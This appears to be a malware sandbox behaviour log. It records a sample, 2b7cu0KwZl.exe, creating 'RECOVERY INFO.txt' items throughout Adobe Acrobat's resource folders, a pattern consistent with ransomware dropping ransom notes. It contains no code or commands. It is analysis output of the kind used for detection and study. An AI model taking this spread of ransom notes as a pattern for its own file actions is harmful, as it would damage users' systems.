Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
